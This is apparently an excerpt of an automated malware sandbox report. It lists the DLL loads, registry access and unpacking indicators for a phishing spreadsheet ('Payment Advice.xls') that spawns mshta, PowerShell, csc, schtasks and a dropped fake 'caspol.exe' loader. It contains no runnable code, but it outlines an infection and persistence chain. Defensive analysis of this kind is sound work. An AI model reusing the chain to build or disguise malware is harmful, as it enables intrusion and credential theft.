                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Section loaded: wow64win.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Section loaded: wow64cpu.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Section loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Section loaded: bcrypt.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Section loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Section loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Section loaded: propsys.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Section loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Section loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Section loaded: rpcrtremote.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64win.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64cpu.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rpcrtremote.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcrypt.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64win.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64cpu.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rpcrtremote.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcrypt.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: wow64win.dll
                    Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: wow64cpu.dll
                    Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: ktmw32.dll
                    Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Section loaded: wow64win.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Section loaded: wow64cpu.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Section loaded: mozglue.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Section loaded: dbghelp.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Section loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Section loaded: msvcp140.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Section loaded: vcruntime140.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Section loaded: ucrtbase.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Section loaded: winmm.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Section loaded: wsock32.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Section loaded: vaultcli.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Section loaded: netapi32.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Section loaded: netutils.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Section loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Section loaded: wkscli.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Section loaded: samcli.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Section loaded: samlib.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Section loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Section loaded: rasadhlp.dll
                    Source: C:\Windows\System32\taskeng.exe | Section loaded: ktmw32.dll
                    Source: C:\Windows\System32\taskeng.exe | Section loaded: wevtapi.dll
                    Source: C:\Windows\System32\taskeng.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\System32\taskeng.exe | Section loaded: rpcrtremote.dll
                    Source: C:\Windows\System32\taskeng.exe | Section loaded: xmllite.dll
                    Source: C:\Windows\System32\taskeng.exe | Section loaded: dwmapi.dll
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe | Section loaded: wow64win.dll
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe | Section loaded: wow64cpu.dll
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe | Section loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe | Section loaded: bcrypt.dll
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe | Section loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe | Section loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe | Section loaded: propsys.dll
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe | Section loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe | Section loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe | Section loaded: rpcrtremote.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64win.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64cpu.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rpcrtremote.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcrypt.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64win.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64cpu.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rpcrtremote.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcrypt.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: wow64win.dll
                    Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: wow64cpu.dll
                    Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: ktmw32.dll
                    Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe | Section loaded: wow64win.dll
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe | Section loaded: wow64cpu.dll
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: version.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: dwmapi.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: rpcrtremote.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: secur32.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: winhttp.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: webio.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: iphlpapi.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: winnsi.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: dnsapi.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: dhcpcsvc6.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: dhcpcsvc.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: nlaapi.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: rasadhlp.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: oleacc.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: sxs.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: credssp.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: ncrypt.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: bcrypt.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: gpapi.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: mpr.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: scrrun.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: propsys.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: ntmarta.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: d2d1.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: dwrite.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: dxgi.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: d3d11.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: d3d10warp.dll
                    Source: C:\Windows\System32\mshta.exe | Section loaded: msls31.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rpcrtremote.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: webio.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rpcrtremote.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Section loaded: wow64win.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Section loaded: wow64cpu.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Section loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Section loaded: bcrypt.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Section loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Section loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Section loaded: propsys.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Section loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Section loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Section loaded: rpcrtremote.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64win.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wow64cpu.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64win.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64cpu.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: ktmw32.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: wow64win.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: wow64cpu.dll
                    Source: C:\Users\user\AppData\Roaming\caspol.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: PORTS SITUATION BULK CARRIERS.xlsx.0.drInitial sample: OLE zip file path = xl/calcChain.xml
                    Source: PORTS SITUATION BULK CARRIERS.xlsx.0.drInitial sample: OLE zip file path = docProps/thumbnail.wmf
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                    Source: Payment Advice.xlsStatic file information: File size 1136128 > 1048576
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.pdbhP source: powershell.exe, 00000005.00000002.454706317.00000000025C3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\zpwvvpvf\zpwvvpvf.pdb source: powershell.exe, 0000001F.00000002.519043845.000000000238B000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\zpwvvpvf\zpwvvpvf.pdbhP source: powershell.exe, 0000001F.00000002.519043845.000000000238B000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.pdb source: powershell.exe, 00000005.00000002.454706317.00000000025C3000.00000004.00000800.00020000.00000000.sdmp
                    Source: PORTS SITUATION BULK CARRIERS.xlsx.0.drInitial sample: OLE indicators vbamacros = False
                    Source: Payment Advice.xlsInitial sample: OLE indicators encrypted = True

                    Data Obfuscation

                    Source: 11.2.caspol.exe.354e230.4.raw.unpack, a6RnQjwUyOApqVRoTt.cs .Net Code: mDY2StBQj7 System.Reflection.Assembly.Load(byte[])
